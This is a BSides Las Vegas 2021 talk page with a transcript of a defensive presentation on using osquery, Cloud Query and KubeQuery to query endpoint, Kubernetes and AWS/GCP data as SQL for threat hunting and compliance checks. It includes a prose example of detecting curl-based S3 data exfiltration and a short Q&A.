← All talks

JOINing Across the Stack: Structured Security Analytics for the Modern Attack Surface

BSides Las Vegas · 202143:5231 viewsPublished 2021-08Watch on YouTube ↗
Speakers
Tags
Mentioned in this talk
About this talk
Eric Kaiser presents a framework for unified security analytics across cloud and endpoint infrastructure. The talk introduces osquery, Kubernetes Query (KubeQuery), and Cloud Query—tools that normalize heterogeneous cloud provider APIs, container orchestration, and endpoint telemetry into queryable SQL tables. Kaiser demonstrates practical compliance checks (S3 encryption, IAM password policies) and discusses the challenges of normalizing 600+ AWS services into a coherent security observability platform.
Show original YouTube description
BG - JOINing Across the Stack: Structured Security Analytics for the modern attack surface - Mr. Eric Kaiser Breaking Ground BSidesLV 2021 - Camp Stay At Home - August 1 Video Tags: bslv2021-bg-joining_across_the_stack-1047496
Show transcript [en]

this next talk is being presented by breaking ground it's joining across the stack by eric kaiser thank you welcome to structured security analytics for cloud workloads or select star for the monitor attack service my name is eric i'm a security engineer at optics and today we're going to talk about security analytics we'll start with a brief agenda the introduction which we're in the middle of some cloud security and visibility challenges structured telemetry what it is why it is why you might care a brief introduction to os query a brief introduction to cloud query and an even briefer introduction to cube query then if all goes well i'll do a quick live demo to show you some of the things

that i talk about in this presentation and there will be a wrap up and time for q a so who am i my name is eric i've spent about four years in infosec at this point i'm a relative newcomer i've had two or three different career paths at this point i play defense or blue team i am endpoint and cloud security engineering internal to optics with an os and system level security focus and for my free time i like to pretend i'm a gear head by riding and wrenching on motorcycles so let's talk about some cloud security and observability challenges from the sans 2020 cloud sex survey major issues and concerns related to cloud computing

models data the single largest is visibility into and control over sensitive data processed where that is how it's managed but close behind our need for additional i.t security staff seemingly a perennial problem consistent security controls and policies and maintaining compliance another one that everyone loves mainly as we grow as the cloud grows as technology explodes we see an explosion of native services and tools to the cloud and each of those are separate silos separate data separate ways to manage look at and introspect things across amazon google azure the challenges are maintaining visibility across the hybrid and public cloud multi-cloud infrastructure since each of those providers have different apis different ways of thinking about and presenting data

according to 2021 cloud pegboard uh there are roughly 305 different aws services uh and the curve on that is really only exponential they count services by name spaces and we can see the trend of that line azure and gcp are unfortunately not much better they are growing as rapidly if not more so and each of those different services are their own silo their own data their own piece of wondering about and worrying about where is this how is this working okay so you the modern attack surface is also exploding right users applications and data no longer only live on the corporate network behind the firewall behind the vpn in that safe little walled garden or

that crunchy shell with the gui inside and observability is really needed across the whole range of cloud native ecosystems so in your infrastructure that runs your company's business or your own personal infrastructure right your workloads tend to be more dynamic more ephemeral resources are spun up and down on demand devops teams are empowered to deploy ever more rapidly right 10 or 100 deploys a day wouldn't it be nice if security could keep up if you could have some visibility into that the traditional endpoints are still there of course your your hosts your virtual machines but they're in some ways at greater risk given the explosion of rolling or flexible work from home policies pandemics and new byod policies people really want

to work the way that they want to work as opposed to using an i.t issued corporate laptop identity and authorization and access management are in some ways the new firewall right the new perimeter especially with zero trust growing as a concept an idea that wants to be implemented iam is in some ways the barrier between malicious actors and the rest of all of your resources and of course applications right software as a service your sensitive data lives in the cloud somewhere it lives in office 365 or it lives in slack ideally your entire workload doesn't live in slack or all of your data but there are some pretty good wikis out there for my understanding

so all of these different pieces are combining to form this new modern attack surface right all of these present new risks new opportunities but with proper methodology hopefully they can be observed if not contained so structured security analytics is a group of tools that are designed to introspect and uh identify data in and across all of these different components of the attack surface os query is the baseline of this it starts with hosts endpoints virtual machines and even container visibility next is cube query which is container orchestration visibility to get you information about your kubernetes deployments cloud query which is cloud provider visibility for aws gcp and azure and hopefully soon sas query and identity query to be able to

pull in and normalize data from your identity providers your sas providers office 365 g suite octa all the usual so what are or why or even structured security analytics right so the first and most important benefit is being able to use your security team's existing familiarity with sql and on the flip side of that lessen the impact of unfamiliarity with the vast array of attack surface data sources right how you ask questions about an endpoint is completely unlike how you might ask questions of aws unless you have a giant giant logging pipeline and data normalization engine right and this allows you to structure queries similarly across heterogeneous os and cloud platforms moving on to the building blocks of this

the os query is a project that was open source by facebook in 2014 it is a project that was brought on by the linux foundation in 2019 just before query con that year in fact it supports mac os linux and windows on the endpoint and freebsd if you really needed to and it was designed for low resource utilization it has a watchdog and um if it gets out of control will sort of throttle back and normalize itself so it's not just one more agent that your users are going to dislike and the awesome thing that it did was it structured endpoint to laboratory as virtual sql tables for querying so you could write things like

select star from uptime and get an idea of how long the computer had been on or select star from chrome extensions which would allow you to see all of the chrome extensions across all of the users and from there take the chrome extension ids and pivot to or join that against reputation databases some use cases right endpoint detection and response well detection os queries read only after the fact investigation and threat hunting audit and compliance on disk it uses a data cache that is rocksdb and there's two main components to it os query d is the background daemon that runs scheduled queries so every 300 seconds or every 600 seconds get me the list of running

processes get me the chrome extensions that are on the computer and the other part which is os query i which allows you to run real-time and interactive queries os query d is probably the main use of os query certainly the main use of os query as the agent that's running scheduled queries on endpoints every so often now what you do with those you have all these wonderful results all of this wonderful telemetry what happens well you get to deliver results to various destinations you can log out to a file you can log out to a unix socket if you need the way that it was originally designed was to take all of those logs and ship them to an upstream tls

endpoint sort of a fleet manager or aggregator and that fleet manager in turn could turn around and schedule queries or update query packs across the fleet newer extensions to os query have allowed you to deliver results to kinesis or kafka for sort of more traditional cloud logging pipelines as a way to ingest that data as one more piece from your fleet so starting with osquery starting with this idea of a binary that is turning uh otherwise varied or inaccessible data into normalized sql and json results is cloud query so cloud query is an open source extension to os query it sort of sits alongside it released in 2021 and it was announced at osquery at scale

and it extends the idea of sql-based analytics to cloud infrastructure currently it supports aws gcp and azure the three main public clouds with more tables being added right we started with the bare bones minimum viable product and more tables and more data sources are being added and it allows you to as with os query d and os qrei run scheduled and real-time queries some use cases for that might be resource visual visualization right being able to ask the question of show me all of the ec2 instances show me all of the s3 buckets show me all of the iam users and from there you can monitor your current configuration compare that to your baseline expected

configuration so you can monitor drift in your aws resources over time because the queries can be scheduled and because the results can be sent somewhere saved or logged you have not only point in time data sources or investigational capability but you also have compliance capability right because you have a record of how things have been ever since you started using cloud query so even more than that right you can detect missed configurations s3 buckets you can verify that mfa is enabled for all users you can do root cause analysis uh or after the fact security investigations if something has gone wrong you can again compare sort of previous cloud query results to what might be the case or even go ask

specific questions that you weren't before but can in real time in the moment overall security overall compliance right being able to take all of this data from a cloud and turn that into something that is structured data we'll talk a little bit more about this as well but one of the things that you can do is ensure conformance to something like the aws cis benchmark right not only as a way to validate not only that devops is shipping not only that security controls are working but everything is secured to a minimum baseline so let's take a quick look at how telemetry provides insights using a combination of the aws cloud api and os query running on an ec2

ami virtual machine in an aws environment so let's consider the following sequence of events a user who has iam credentials logs into an aws account and they launch an ec2 instance from a trusted ami in your environment when that boots this ec2 instance runs an ubuntu server which mounts an s3 bucket containing sensitive data the ubuntu software utilities which are running in the context of the server in the instance have access to data from the s3 bucket okay inside that instance a malicious script launched by the user whether a mal actor or an inside job as it were invokes a curl command that curl command performs a dns lookup that dns lookup is captured by os query

and can be joined against sources that do domain reputation domain tools for example that curl command then establishes the tcp ip socket and again that ip address can have a reputation in a database and then finally it establishes an https tls connection which can have a ja3 or charm reputation as well once all of that's complete the curl command exfiltrates the file from the s3 bucket and ships that off so that scenario has outlines the possibilities where a male actor with access to credentials again however they came by them intentional or not is able to masquerade and exfiltrate information from a cloud workload right sensitive data stored in an s3 bucket trusted ami shipped off data to

elsewhere so the first part of the interactions in the above scenario which is confined to the aws api data this is where cloud query is going to provide that relevant telemetry the telemetry includes details about the iam account used the ec2 instance details the configuration and access information about the s3 bucket where the data was stored and the cloudtrail activity which captures details about the connection with those specific iam credentials launching the ec2 instance from the trusted ami and finally that ec2 run of the ubuntu operating system the second part which is os query running inside the ec2 instance has the ability to capture telemetry at various stages of the attack happening inside the virtual machine so the os query process

events table has the ability to capture that a kernel command has been invoked the process hierarchy in the process events table entry shows the curl command itself with arguments that the curl command was invoked by a specific user in a specific shell that was created due to an ssh login and the tty linked to the ssh login chained all the way back up to the root process manager pid one so there's a you know ancestor of an ancestor of an ancestor of an ancestor all the way back to root when the socket connection is established the process socket events table from os query can provide the necessary information to link the reputation of the iep against

a known domain the dns events and http events tables provide additional information that can be correlated against the domain and https reputation databases the url information can be joined again against j3 reputation databases and additionally if the file was copied to a disk or a location on disk somewhere before it was exfiltrated you can use process file events table to capture telemetry to determine if the creation of the file based on folder location or other events might be a indicator of malicious activity so with all of these pieces right beginning from the user logging in with iam credentials all the way down to the final exfiltration of the file via the curl command you can see that

with these two pieces there's the ability to track the flow of the attack from start to finish right through the entire chain of events so what can you cloud query right knowing that you can ask questions of aws this is a quarter i think a third as an example of the tables that are available in cloud query that you can ask questions of ec2 images ec2 instances security groups volumes all of the iam groups and policies and roles and users password policies s3 buckets cloud watch alarms uh ecs clusters eks clusters a lot of the data that amazon exposes kind of high level or more detailed is represented across the tables in cloud query you can also query gcp compute disks

images networks routes vpn tunnels iam roles and service accounts just like you can in aws even gcp sql instances or storage buckets mapped to something like s3 buckets so let's take a look at a sample aws cis benchmark this is from version 1.2 which is a little old but still relevant and relates to securing s3 buckets right we want to ensure that s3 buckets are configured with block public access at the bucket level we want to ensure that all s3 buckets employ encryption at rest and we want to make sure that the bucket policy allows https requests so let's check this is a sample query for cloud query we are getting the name the status

and the region from the aws s3 bucket right when server-side encryption configuration from the s3 bucket table is not null then everything's fine encryption is configured when it's not null then something is wrong right as long er i'm sorry when it is null something is wrong and then what this does is take that data and present it in a nice table format so you can see at a glance which buckets have it enabled which buckets have it disabled there's more to s3 tables than just cis benchmark compliance or even benchmark compliance period bcdr or safety right let's make sure that s3 versioning is turned on in case an accidental or malicious employee nukes files in the

bucket not only are the files there but there is a history of those files to say nothing of change control right you can go back and say okay you know it was changed on this date by this person this check just ensures that versioning status is turned on if it's turned on then great otherwise it pops a warning right something's wrong now that might not be a failure but this is a great way to again see at a glance what's happening with s3 buckets how about password compliance we can ensure that the ian password policy meets all of the requirements one uppercase letter one lowercase letter one hieroglyph that you were facing west on tuesday

when you made it that it has a minimum length of 14 or greater that it expires passwords within 90 days or less that a black cat walked under a ladder and you saw the full moon in the sky all the okay usual not trust anybody with the wonderful new world of xero trust let's make sure not only that users have strong policies but that the policy itself is configured so if the minimum password length is set to null no password policy is set that is the gateway through which all others must pass because a policy has to be set otherwise if it's greater than equal or if it's greater than 14 characters and we have set all of these other things

require lower case require uppercase et cetera et cetera then strong password policies are configured otherwise not at all this is from the aws iam account password policy table which turns all of the uh iam data into again a sql table you can query we'll talk a little bit more about uh some of those in the demo when we get to that and you can see what some of those results look like so let's talk about cube query briefly this is also an open source extension released in 2021 also announced at osquery at scale whoops

all right let's talk about cube query this is an open source extension released in 2021 announced at osquery at scale and it extends that concept of sql-based analytics to kubernetes it has support for kubernetes openshift aws eks google and google cloud gke it doesn't currently support azure kubernetes but i believe that that is in development okay so the use cases there are container security at the individual and pod level monitoring configuration and security policies and again everyone's favorite compliance it is important to be aware that cube query runs as a daemon set in kubernetes it doesn't run in each individual container that's the role for os query in each container if desired there's a lot of prior art about os

query in temporary containers being spun up and spun down it is still possible to get useful data out of them query con 2019 is a good starting point for that if you want to dig further it's also important to be aware that the amount of json in uh sql columns that comes back from kubernetes can be quite high um it is normalized a lot of it is turned into individual columns in the tables but because there is a great deal of flexibility in the data that comes back some flexibility has been left in on purpose and that's where sqlite or other sql engines json parsing can come in to turn that into columns or other data as you see the

need or see fit so there's a missing piece in all of this which is that you will probably want something upstream of all of these different os query extensions that are running in the cloud as a damon said in kubernetes on an ec2 aws instance running queries every so often and that is query tls so it is a very very very minimal os query upstream tls endpoint that can be deplo deployed in aws as a lambda function it persists log data to s3 organized by day it allows you to create rule and alert notifications using json logic and it is a very minimal bare bones logging infrastructure for cloud and cube query and os query to get you started seeing

what scheduled queries from cube query d and cloud query d are going to look like all right it's demo time so we talked a little bit earlier about the uh aws s3 bucket uh queries i've got a live demo environment running cloud query let's go ahead and switch over to that and see what the queries look like so again we are i'm running cloud query in a docker image it is a bundle uh which is how cloud query is shipped it's the easiest way to get started um you can run it in an ec2 instance with cloud permissions or ideally a credentials.json file for an aws service account we're running os query i to do cloud query queries again these

are things that would normally be expected to be run as scheduled query packs by cloud query d in the background somewhere checking on the status of these things from time to time and then shipping those logs somewhere else so it can take some time to return data which is especially why running those scheduled queries is helpful but we did get a quick result back here from the aws iam account password policy and for the purposes of this demo you can see that we do not have strong password policies uh they are not configured so again we're we we do have a minimum password length set because it's not null so we didn't get the no password policy set warning

but while the minimum password length is less than 14 so again for the purposes of this demo this is not a good aws security policy let's do a quick recap so cloud query extends os query to deliver data about cloud infrastructure in a structured format right it's taking all of the pieces of aws the pieces of gcp the pieces of your infrastructure in azure and it's turning all of that into a set of sql tables that you can ask questions of generally in real time especially again for investigative purposes cube query does the same thing for public cloud kubernetes being able to take all of the data across all of these various different sources and stream that data as json results

to your upstream aggregator whether that's query tls whether that's kinesis or kafka whatever your upstream logging or investigation or normalization solution is you can take all of this data and ship it there you can also if you're using some kind of tls endpoint or interactive os query turn around and ask questions of all of these different data sources across your fleet right again we talked about some of the use cases there cloud security investigation and threat hunting audit in compliance especially with the history of your results over time i t or operations configuration and monitoring again uh telemetry powered security or structured security analytics the various different adjuncts and extensions to os query the tool suite consisting of

os query which is for your hosts virtual machines endpoints visibility inside containers cube query for your container orchestration visibility and cloud query for your cloud provider visibility ideally sas query and identity query are coming soon they are things that are being worked on to round out your ability to ask questions of all of these various data sources where do you get it i'm going to leave this up here for just a second github.github.com optics and cloud query cube query and query tls again cloud query and cube query are cloud query is distributed as a docker image cube query is a kubernetes daemon set that you can deploy and query tls is an aws lambda function

that you can use as your upstream result aggregator and now with the plethora of remaining time that i assure that i that i'm sure that i have i am happy to take and answer questions all right great thank you so much for that great presentation uh i really appreciate it um you know uh you know that's a couple of people this question uh as we've gone through um you know people submit these talks you know weeks and months uh before the conference happens is there are there any updates you'd like to give uh before i start going to the chat for questions uh a couple of pieces uh and thank you so much um i did not manage to get the demo working

uh but i will drop the actual queries that i used in the chat um so folks can take a look at those if they want to go play around with them to get a sense for those aws s3 queries um and i will do that in just a second um the other thing that i will say is that um because this project is fairly new um it was you know released right at the beginning of 2021 it's six or seven months old uh it is growing uh fairly rapidly um we're adding new tables and new data sources um pretty often um even from like when i went from planning this talk to uh going through and and the cfp and all

of that i think we've almost doubled uh the amount of tables across all three major data sources um it's it's certainly growing and we're trying to keep the momentum going keep putting it out there you know obviously you're up here you're giving this presentation it sounds to me like there's a lot of people behind the scenes um behind the talk here do you want to talk about that for a bit yeah i surely do and i definitely don't want to take a whole lot of credit for this um i i am blue team at optics um and i use this tool every day um but most of the coding um and all of the sort of

behind-the-scenes work uh was actually done by a whole crew of talented individuals over here um and i want to give a big shout out to them and a thank you because this kind of work wouldn't be possible i'm just sort of the the face of the project uh at least in this particular talk so for sure the the other thing that i would say maybe maybe as a piece of that um kind of why we did this uh and where that came from uh is optics is an os query company um we started uh with osquery specifically for just the endpoints uh and as we've grown and as we've seen uh needs grow we've sort of started

using and developing tools to to build on that because because of the power that we've seen in structured telemetry and again i mentioned some of those in the talk the the two that are hypothetical are still hypothetical i don't have anything else to add on that but we are uh still interested and looking forward to doing those at some point great all right um you know i've been i've been doing these interviews now for the last two days and uh one of the things i like to ask first uh it's always interesting to me for for researchers you know what was um what was the hardest part about doing this research for you so uh the hardest part is actually

what the project was intended to solve especially for cloud query um working with three different public cloud apis um how those calls are made um how being able to talk is you know three different languages right three different full apis across however like 600 different individual services and taking all of those results taking all of those requests and turning that into something that looks like a sql table or a sql database that you can actually access with those queries there's a lot of json there's a lot of other things that come back and normalizing that is hard and it's still hard there are you know we're we're continuing to work on it but there are times when

uh you'll get a table uh a table row or a column result that's entirely json because uh there isn't necessarily a clean way to parse that out into something that maps cleanly to just columns and rows but uh we like to think we're making progress oh yeah it sounds very complicated to be dealing with that many data sources uh so so in the same vein so then what you know there's heart pieces but what was surprising about this research um both uh some of the ways uh i guess what i'll say is the the surprising part about uh was like how cool it was when it came together um i'm not used to thinking in sequel um

i i came to that sort of late um you know i was a lot more like uh elasticsearch sort of unstructured data and just figuring out how to work through that an incident response or other kinds of things um but uh being able to look at it in database form and being able to kind of join both from cloud sources and um endpoints and being able to watch an attack move from you know somebody in san francisco and someone else you know who's awake across the world and through that the cloud being able to see all of those pieces connect using a single tool was very powerful um it was one of my like aha

or very cool moments so so why do you think no one's done this before uh or have they tried and failed or like so there there are actually um a couple of other things like this um i i don't know that we can claim that we're the first necessarily that we are definitely uh trying to do our best uh steam pipe is another option out there that does sort of similar ideas um i don't actually know if that's open source or not but it's been come across my radar recently and there is another uh there is actually something else called cloud query uh that does uh things very differently under the hood that's a neo4j database

and and graphs and all of the rest um and that that is like cloud first and cloud only and we started at the endpoint and are working our way up kind of through all of the various different pieces of the stack um so it's just kind of a different directional approach nice uh it's the other yeah apologies enough for cutting off but um the the thing here is being able to take um we've had a lot of i've heard across all of the os query conferences that i've been at um and and uh some of the blue team uh hangouts is uh os query a lot of folks love osquery it's open source it's awesome uh it's a

great endpoint monitoring agent and uh it is now old enough that there is a great deal of experience or at least you know five or six or eight years of experience with osquery and people want to take that they want to take the experience that they have they want to have take the people on their teams who know how to work with it and are sort of thinking that way and move that into other areas of the attack service in the company so speaking of uh enterprises you know uh we were talking previously about how you know i'm from the bay area and you know a lot of those companies were cloud native they grew up in the cloud

yeah um you know but other legacy companies are slowly moving their their infrastructure to the cloud do you think this gives them you know a leg up in terms of being able to monitor both the endpoints and the cloud stuff in in one space does it is it is it going to help them centralize faster than say say the the companies that had to build this stuff from scratch i'd like to think so um so there the first piece of that is uh there are certainly a lot of folks in your enterprise who have uh sql experience right and being able to take that and and how you think about uh getting data out of databases and and

you know being able to synthesize and correlate that together um being able to just take that and apply it in a new domain uh by virtue of this tool is very powerful and we like to think that the on-ramp is pretty short for that um it does uh again because of the sort of direction that we're building this from workstations up um you know starting with os query and and being able to look at your fleet and that's servers and laptops and workstations like you know if it runs an operating system you can put os query on it uh and then being able to do the same thing with the cloud right it's it's one

tool for all of the things that you care about right being able to instead of this tool for endpoints and this tool for the cloud and wait that was the wrong tool and we have to go back and do it and we you know now we have two and a half tools because we're behind start with one grow from there right nice yeah so you know this is obviously this project is an open source project and we talked about earlier how you know it's not the first but it's the first way of doing this um when it comes to the blue team and sort of centralizing and normalizing this kind of how mature do you think the open source community is

when it comes to stuff like this um so i would call i would call this sort of um late early stage right um there's osquery is fairly mature um this project is six months old i'm i'm not gonna and it's a little uh a little bit older than that internally um it is uh it is one of the the underpinnings of the service that optics offers it powers parts of our stack but

there's certainly work to be done to figure out how to not only add new data sources again just in general right like figuring out how to take data from various different clouds put that into database form there's plenty of opportunity and we welcome contributions we'd love to see you know what can be done with this in ways that we haven't even considered yet um so it's it's stable um but still early days so so what do you see the future like what what gets excited about the future of this so the excitement for me is adding data sources that aren't necessarily traditionally uh thought of as the cloud so maybe a good example i can give is

terraform right terraforms uh infrastructure is code tool and you can use terraform when it started it was you know use it for aws use it for spinning up resources in the cloud spin it up for gcp and terraform has turned into being able to you know plan out your entire infrastructure across all kinds of different things uh cloudflare for example you can spin up you know whole different pieces of cloudflare infrastructure in terraform even though it wasn't necessarily uh created for that and so i would love to see this sort of structured analytics approach go from just not just you know this piece of the cloud or how we traditionally think about the cloud but

all of the resources that you might have in the cloud again sas identity various other resources being able to pull that all into one bucket or at least one sort of structured kind of bucket and query that no matter the data source so so you gave you give a great presentation and we've been talking for like you know 10 12 minutes minutes about this what you know people people want to get you know really get into this what would be the three like key takeaways from this like what will be the like the most important thing that they take away from this talk yeah so uh the things that i'm excited about the things that i'd love for people to

to keep in mind is um not only that osquery is out there um because it is awesome and and maybe for folks who haven't considered it please do check it out but uh now it can do even more by virtue of these open source extensions you can go query your kubernetes infrastructure on public clouds get data the same way you can query your aws azure and gcp resources the same way uh and uh check out our public github repos github.com uh the links are in the slides i'll put them in the chat again if people want to uh check them out and uh pull requests welcome okay that was gonna be my next question is where they where can they people

follow up and follow the research but um do you have a twitter handle or anything that you wanna you wanna put out there for people uh i do i do exist on twitter but uh i can't say that i post about this much i'm not as active as i would like to be uh github is the place to go all right well great well thank you so much uh for giving this presentation um you know the breaking grounds is for new and exciting research uh not just red team but also blue team so we really appreciate you sending the talk and coming and taking the time to give this this talk so thank you so much thank you

so very much for having me it's been a pleasure